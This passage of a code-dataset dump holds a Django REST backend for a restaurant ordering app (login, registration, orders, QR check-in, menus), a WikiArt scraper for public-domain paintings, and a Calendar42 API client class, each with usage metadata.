'@action()' decorator, default response\n is GET, you can add POST using 'methods' argument\n \"\"\"\n serializer_class = TipRestavracijeSerializer\n queryset = TipRestavracije.objects.all()\n model = TipRestavracije\n\n\nclass AdminUporabnikViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = AdminUporabnikSerializer\n queryset = AdminUporabnik.objects.all()\n model = AdminUporabnik\n\n @action(detail=False, methods=['POST'])\n def login(self, request):\n \"\"\"\n The function receives JSON data with the email and the password. 
If the user exist and the password is\n correct we return the id of the restaurant the user manages, if he does not manage any restaurant returns None.\n Return values\n status: 0 - Error, 1 - OK\n description: Short description of Error or confirm desired action\n id_restavracija: If status 1, id of restaurant or None\n \"\"\"\n response = {}\n\n # First try to get the user\n try:\n user = AdminUporabnik.objects.get(email=request.data['email'])\n except AdminUporabnik.DoesNotExist:\n user = None\n\n # if user exist check password\n if user is not None:\n password = request.data['password']\n match = check_password(password, user.password)\n if not match:\n response['status'] = 0\n response['description'] = \"Password does not match\"\n return Response(response, status=status.HTTP_401_UNAUTHORIZED)\n else:\n query = Restavracija.objects.all().filter(id_admin=user.id)\n data = RestavracijaSerializer(query, many=True).data\n\n if len(data) != 0:\n id_restavracija = data[0]['id_restavracija']\n else:\n id_restavracija = None\n\n response['status'] = 1\n response['description'] = \"Username and password match\"\n response['id_restavracija'] = id_restavracija\n return Response(response, status=status.HTTP_200_OK)\n else:\n response['status'] = 0\n response['description'] = \"Username does not exist\"\n return Response(response, status=status.HTTP_401_UNAUTHORIZED)\n\n @action(detail=False, methods=['POST'])\n def register(self, request):\n \"\"\"\n The function receives JSON data with the email and the password.\n If the input data is valid it creates a new admin user.\n Return values\n status: 0 - Error, 1 - OK\n description: Short description of Error or confirm desired action\n \"\"\"\n serializer = AdminUporabnikSerializer(data=request.data)\n response = {}\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"New user created\"\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n email_error = (\"Email - \" + serializer.errors['email'][0]) if 'email' in serializer.errors else \"\"\n password_error = (\n \"Password - \" + serializer.errors['password'][0]) if 'password' in serializer.errors else \"\"\n\n response['status'] = 0\n response['description'] = \"Error: \" + email_error + password_error\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UporabnikViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = UporabnikSerializer\n queryset = Uporabnik.objects.all()\n model = Uporabnik\n\n @action(detail=False, methods=['POST'])\n def get_orders(self, request):\n \"\"\"\n Return all orders and meal data for given user\n \"\"\"\n response = {}\n try:\n id_uporabnik = request.data['id_uporabnik']\n except KeyError:\n id_uporabnik = None\n\n try:\n limit = int(request.data['num_orders'])\n except KeyError:\n limit = 10\n\n if id_uporabnik is None:\n response['status'] = 0\n response['description'] = \"Error: Please input the user id\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n else:\n response['status'] = 1\n response['description'] = \"Orders for user: \" + id_uporabnik + \"\"\n response['orders'] = get_orders(id_uporabnik, limit)\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def register(self, request):\n \"\"\"\n The function receives JSON data with the token of the new user.\n If the input data is valid it creates a new user.\n Return values\n status: 0 - Error, 1 - New user created, 2 - User already 
registered\n        description: Short description of Error or confirm desired action\n        \"\"\"\n        try:\n            user = Uporabnik.objects.get(id_uporabnik=request.data['id_uporabnik'])\n        except Uporabnik.DoesNotExist:\n            user = None\n\n        response = {}\n        if user is None:\n            serializer = UporabnikSerializer(data=request.data)\n            if serializer.is_valid():\n                serializer.save()\n                response['status'] = 1\n                response['description'] = \"New user created\"\n                return Response(response, status=status.HTTP_201_CREATED)\n            else:\n                id_error = \"ID: \" + serializer.errors['id_uporabnik'][0]\n                response['status'] = 0\n                response['description'] = \"Error: \" + id_error\n                return Response(response, status=status.HTTP_400_BAD_REQUEST)\n        else:\n            response['status'] = 2\n            response['description'] = \"User already registered\"\n            return Response(response, status=status.HTTP_200_OK)\n\n    @action(detail=False, methods=['POST'])\n    def check_in(self, request):\n        # TODO: Implement check in from user\n        response = {}\n        try:\n            id_narocila = request.data['id_narocilo']\n            qr = request.data['qr']\n        except KeyError:\n            response['status'] = 0\n            response['description'] = \"Error: Missing either id_narocilo or qr\"\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n        # noinspection PyBroadException\n        try:\n            order = Narocilo.objects.get(id_narocila=id_narocila)\n            order_id_restaurant = order.id_restavracija\n        except Exception:\n            response['status'] = 0\n            response['description'] = \"Could not retrieve order {}\".format(id_narocila)\n            return Response(response, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n        try:\n            Mize.objects.get(id_restavracija=order_id_restaurant, id_miza=qr)\n        except ObjectDoesNotExist:\n            response['status'] = 0\n            response['description'] = \"Error: Restaurant ID and QR do not match for provided Order\"\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n        data = model_to_dict(order)\n        data[\"checked_in\"] = True\n        data[\"id_miza\"] = qr\n\n        serializer = NarociloSerializer(data=data, instance=order)\n        if serializer.is_valid():\n            serializer.save()\n            # Add order to checked_in array to be used in refresh api call\n            order_dict = {'id_narocila': order.id_narocila, 'qr': qr,\n                          'id_restavracija': order.id_restavracija.id_restavracija}\n            add_checked_in_order(order_dict)\n\n            response['status'] = 1\n            response['description'] = \"Successfully checked in order\"\n            return Response(response, status=status.HTTP_200_OK)\n        else:\n            response['status'] = 0\n            response['description'] = serializer.errors\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass JedViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):\n    serializer_class = JedSerializer\n    queryset = Jed.objects.all()\n    model = Jed\n\n    def list(self, request, *args, **kwargs):\n        return_data = defaultdict(list)\n        get_params = request.query_params\n\n        try:\n            id_restavracija = get_params['id_restavracija']\n        except KeyError:\n            response = {\n                'status': 0,\n                'description': \"Missing id, add ?id_restavracija=x to call\"\n            }\n            return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n        meal_types = JedilniList.objects.all()\n        meal_types = JedilniListSerializer(meal_types, many=True).data\n        meal_types = {x['id_jedilni_list']: x['vrsta'] for x in meal_types}  # Transform OrderedDict to dict\n\n        meals = Jed.objects.filter(id_restavracija=id_restavracija)\n        meals = JedSerializer(meals, many=True).data\n\n        for meal in meals:\n            typ = meal_types[meal['id_jedilni_list']]\n            return_data[typ].append({\n                'id_jed': meal['id_jed'],\n                'ime_jedi': meal['ime_jedi'],\n                
'opis_jedi': meal['opis_jedi'],\n 'cena': meal['cena'],\n 'kolicina': 1\n })\n\n return Response(return_data, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def new_meal(self, request):\n \"\"\"\n Create new meal\n \"\"\"\n serializer = JedSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n response = {'status': 1, 'description': \"New meal created\"}\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n response = {'status': 0, 'description': \"Could not create meal\"}\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n", "sub_path": "ServeUp/Views/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 25251, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 39, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 39, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 71, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 71, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 71, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 88, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 88, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 88, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 95, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 95, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 95, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.utils.json.load", "line_number": 105, "usage_type": "call"}, {"api_name": "rest_framework.utils.json", "line_number": 105, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 111, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 111, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 111, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 121, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 121, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 121, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 125, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_503_SERVICE_UNAVAILABLE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 125, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 97, "usage_type": "call"}, {"api_name": "rest_framework.utils.json.load", "line_number": 136, "usage_type": "call"}, {"api_name": "rest_framework.utils.json", "line_number": 136, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 151, 
"usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 151, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 151, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 156, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 156, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 156, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 168, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 168, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 168, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 176, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 176, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 176, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 180, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 180, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 180, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 127, "usage_type": "call"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 187, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 193, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 193, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 193, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 200, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 200, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 200, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 204, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 204, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 204, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 182, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 207, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 207, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 237, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 237, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 237, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 240, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 240, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 240, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 217, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 283, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 283, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 283, "usage_type": "name"}, {"api_name": 
"rest_framework.response.Response", "line_number": 293, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 293, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 293, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 307, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 307, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 307, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 311, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 311, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 311, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 242, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 332, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 332, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 332, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 344, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 344, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 344, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 313, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 357, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 357, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 357, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 362, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 362, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 362, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 374, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 374, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 374, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 378, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 378, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 378, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 346, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 381, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 381, "usage_type": "name"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 393, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 393, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 393, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 393, "usage_type": "name"}, {"api_name": "django.contrib.auth.hashers.check_password", "line_number": 419, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 423, "usage_type": "call"}, {"api_name": 
"rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 423, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 423, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 436, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 436, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 436, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 440, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 440, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 440, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 398, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 457, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 457, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 457, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 465, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 465, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 465, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 442, "usage_type": "call"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 468, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 468, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 468, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 468, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 492, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 492, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 492, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 497, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 497, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 497, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 473, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 520, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 520, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 520, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 525, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 525, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 525, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 529, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 529, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 529, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 499, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 541, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", 
"line_number": 541, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 541, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 550, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_503_SERVICE_UNAVAILABLE", "line_number": 550, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 550, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 557, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 557, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 557, "usage_type": "name"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 559, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 573, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 573, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 573, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 577, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 577, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 577, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 531, "usage_type": "call"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 580, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 580, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 580, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 580, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 596, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 596, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 596, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 615, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 615, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 615, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 626, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 626, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 626, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 629, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 629, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 629, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 617, "usage_type": "call"}]} +{"seq_id": "74423526", "text": "import urllib\nimport urllib.request\nimport re\nfrom bs4 import BeautifulSoup\nimport time\nimport os\n\nfile_path = \"modern_paintings\"\nos.makedirs(file_path, exist_ok=True)\n\ndef url_open(url):\n req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n retrycount = 0\n s = None\n while s is None:\n try:\n s = urllib.request.urlopen(req,timeout=50).read()\n except Exception as e:\n print(str(e))\n retrycount+=1\n if retrycount > 10:\n raise\n time.sleep(10)\n\n return BeautifulSoup(s, 
\"lxml\")\n\ndef urlretrieve(image_url, save_path):\n retrycount = 0\n s = None\n while s is None:\n try:\n s = urllib.request.urlretrieve(image_url, save_path)\n except Exception as e:\n print(str(e))\n retrycount+=1\n if retrycount > 10:\n raise\n time.sleep(10)\n\ndef get_images(url):\n print(url)\n genre_soup = url_open(url)\n artist_list_main = genre_soup.find(\"main\")\n lis = artist_list_main.find_all(\"li\")\n\n # for each list element\n for li in lis: \n born = 0\n died = 0\n\n # get the date range\n for line in li.text.splitlines():\n if line.startswith(\",\") and \"-\" in line:\n parts = line.split('-')\n if len(parts) == 2:\n born = int(re.sub(\"[^0-9]\", \"\",parts[0]))\n died = int(re.sub(\"[^0-9]\", \"\",parts[1]))\n\n # look for artists who may have created work that could in public domain\n if born>1800 and died>0 and died<1978:\n link = li.find(\"a\")\n artist = link.attrs[\"href\"]\n\n # get the artist's main page\n artist_url = base_url + artist\n artist_soup = url_open(artist_url)\n\n # only look for artists with the word modern on their main page\n if \"modern\" in artist_soup.text.lower():\n print(artist + \" \" + str(born) + \" - \" + str(died))\n\n # get the artist's web page for the artwork\n url = base_url + artist + '/all-works/text-list'\n artist_work_soup = url_open(url)\n\n # get the main section\n artist_main = artist_work_soup.find(\"main\")\n image_count = 0\n artist_name = artist.split(\"/\")[2]\n os.makedirs(file_path + \"/\" + artist_name, exist_ok=True)\n\n # get the list of artwork\n lis = artist_main.find_all(\"li\")\n\n # for each list element\n for li in lis:\n link = li.find(\"a\")\n\n if link != None:\n painting = link.attrs[\"href\"]\n\n # get the painting\n url = base_url + painting\n print(url)\n\n try:\n painting_soup = url_open(url)\n\n except:\n print(\"error retreiving page\")\n continue\n\n # check the copyright\n if \"Public domain\" in painting_soup.text:\n\n # get the url\n og_image = painting_soup.find(\"meta\", {\"property\":\"og:image\"})\n image_url = og_image[\"content\"].split(\"!\")[0] # ignore the !Large.jpg at the end\n print(image_url)\n\n parts = url.split(\"/\")\n painting_name = parts[-1]\n save_path = file_path + \"/\" + artist_name + \"/\" + painting_name + \".jpg\"\n\n #download the file\n try:\n print(\"downloading to \" + save_path)\n time.sleep(0.2) # try not to get a 403 \n urlretrieve(image_url, save_path)\n image_count = image_count + 1\n except Exception as e:\n print(\"failed downloading \" + image_url, e)\n\nbase_url = \"https://www.wikiart.org\"\nurls = []\nfor c in range(ord('a'), ord('z') + 1):\n char = chr(c)\n artist_list_url = base_url + \"/en/Alphabet/\" + char + \"/text-list\"\n urls.append(artist_list_url)\n\nprint(urls)\n\nfrom concurrent.futures import ThreadPoolExecutor\nexecutor = None\nwith ThreadPoolExecutor(max_workers = 16) as executor:\n ex = executor\n executor.map(get_images, urls)\n ", "sub_path": "download.py", "file_name": "download.py", "file_ext": "py", "file_size_in_byte": 3991, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.makedirs", "line_number": 9, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 12, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 12, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 17, "usage_type": "attribute"}, {"api_name": 
"time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.request.urlretrieve", "line_number": 32, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 32, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 56, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 57, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 80, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 118, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "596506285", "text": "import logging\r\nimport requests\r\n\r\nfrom apiproxy import constants\r\nfrom .exceptions import LoggedDetailsAPIException\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nclass APIActionCaller():\r\n\t\"\"\"Abstract class which must be inherited to handle a call to a Calendar42 API action\r\n\t\r\n\tThe abstract methods to implement are:\r\n\t* extract_data()\r\n\t* get_relative_url()\r\n\t\"\"\"\r\n\t\r\n\tdef __init__(self, token):\r\n\t\t\"\"\"\r\n\t\t@param {str} token\tThe authentication token to use when calling the Calendar42 API\r\n\t\t\"\"\"\r\n\t\tself._token = token\r\n\t\r\n\tdef call(self, *args, **kwargs):\r\n\t\t\"\"\"Calls the Calendar42 API and returns the response\r\n\t\tParameters (if any) are forwarded to self.get_relative_url(), which may need some runtime data to compute the URL\r\n\t\t\r\n\t\t@return\t{dict}\tThe JSON API response\r\n\t\t\"\"\"\r\n\t\t\r\n\t\t# Call the Calendar42 API\r\n\t\tfull_url = constants.CALENDAR42_API_BASE_URL + self.get_relative_url(*args, **kwargs)\r\n\t\t\r\n\t\theaders = {\r\n\t\t\t'Accept': 'application/json',\r\n\t\t\t'Content-type': 'application/json',\r\n\t\t\t'Authorization': 'Token %s' % self._token,\r\n\t\t}\r\n\t\tresponse = requests.get(full_url, headers=headers)\r\n\t\t\r\n\t\t# Parse response as JSON\r\n\t\ttry:\r\n\t\t\tjson_data = response.json()\r\n\t\texcept ValueError as e:\r\n\t\t\tlogger.exception(e)\r\n\t\t\tlogger.error(\"URL called: %s\\nHere's the body of the response which couldn't get parsed to JSON: %s\" % (full_url, response.text))\r\n\t\t\traise LoggedDetailsAPIException()\r\n\t\t\r\n\t\t# Extract desired information\r\n\t\ttry:\r\n\t\t\tif 'error' in json_data:\r\n\t\t\t\t# Forward error from Calendar42 API to client\r\n\t\t\t\traise LoggedDetailsAPIException(json_data['error']['message'])\r\n\t\t\t\t\r\n\t\t\treturn self.extract_data(json_data)\r\n\t\texcept (KeyError, ValueError, AttributeError) as e:\r\n\t\t\tlogger.exception(e)\r\n\t\t\tlogger.error(\"URL called: %s\\nHere's the JSON data which didn't fit the expected format: %s\" % (full_url, json_data))\r\n\t\t\traise LoggedDetailsAPIException()\r\n\t\r\n\tdef extract_data(self, json_data):\r\n\t\t\"\"\"ABSTRACT METHOD - TO BE IMPLEMENTED IN CHILD CLASS\r\n\t\t\r\n\t\tExtracts the desired information from the JSON data returned by the Calendar42 API\r\n\t\t@param {dict} json_data\r\n\t\t@return {dict}\tThe extracted data\r\n\t\t\"\"\"\r\n\t\tlogger.exception(NotImplementedError())\r\n\t\traise LoggedDetailsAPIException()\r\n\t\r\n\tdef get_relative_url(self, *args, **kwargs):\r\n\t\t\"\"\"ABSTRACT METHOD - TO BE IMPLEMENTED IN CHILD CLASS\r\n\t\t\r\n\t\tReturns the end of the URL, corresponding to the API action to call\r\n\t\t\"\"\"\r\n\t\tlogger.exception(NotImplementedError())\r\n\t\traise 
